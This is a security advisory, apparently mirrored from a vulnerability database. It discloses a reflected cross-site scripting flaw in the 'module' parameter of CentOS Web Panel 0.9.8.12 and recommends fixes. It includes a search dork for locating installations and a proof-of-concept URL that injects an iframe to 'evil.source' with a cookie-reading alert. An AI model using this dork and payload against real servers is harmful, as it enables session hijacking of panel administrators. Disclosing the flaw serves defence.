Vulners
Lucene search
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
Document Title:
===============
CentOS Web Panel v0.9.8.12 - Non-Persistent Cross Site Scripting Vulnerabilities
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS)
servers without of
need to use ssh console for every little thing. There is lot's of options and features for server management in this
control panel.
CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…).
(Copy of the Homepage: http://centos-webpanel.com/features )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the
CentOS Web Panel v0.9.8.12.
Vulnerability Disclosure Timeline:
==================================
2018-01-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
CWP
Product: CentOS Web Panel - (CWP) 0.9.8.12
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12.
The vulnerability allows remote attackers to inject script code to the client-side browser to application requests.
The client-side cross site web vulnerability is located in the `module` value of the `index.php` file GET method
request.
The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel
application.
The request method to inject is GET and the attack vector is non-persistent. The injection point is the module
parameter
and the execution point occurs in the module exception.
The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system)
count of 3.3.
Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user
interaction.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks,
non-persistent
external redirects to malicious source and non-persistent manipulation of affected or connected application modules.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] index.php
Vulnerable Parameter(s):
[+] module
Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user
account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to
continue.
Dork(s):
"powered by CentOS-WebPanel.com"
PoC: Payload(s)
http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=evil.source%20onload=alert%28document.cookie%29%20%3C
http://localhost:2030/index.php?module=clam
PoC: Exception-Handling
<div class="row">
The module clam>"<[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!]> does not exist.
</div><!-- End .row -->
</div><!-- End contentwrapper -->
</div><!-- End #content -->
</div><!-- End #wrapper -->
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=evil.source%20onload=alert(document.cookie)%20%3C
Mime Type[text/html]
Request Header:
Host[localhost:2030]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Cookie[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1]
Connection[keep-alive]
Response Header:
Server[Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27]
X-Powered-By[PHP/5.4.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Keep-Alive[timeout=5, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html]
Reference(s):
http://localhost:2030/
http://localhost:2030/index.php
http://localhost:2030/index.php?module
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a sanitize of the vulnerable module parameters in the `index.php` file GET method
request.
Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks.
Escape the output content of the error exception for invalid inputs to prevent the execution point of the client-side
vulnerability.
Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as
medium (CVSS 3.3).
# 0day.today [2018-03-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1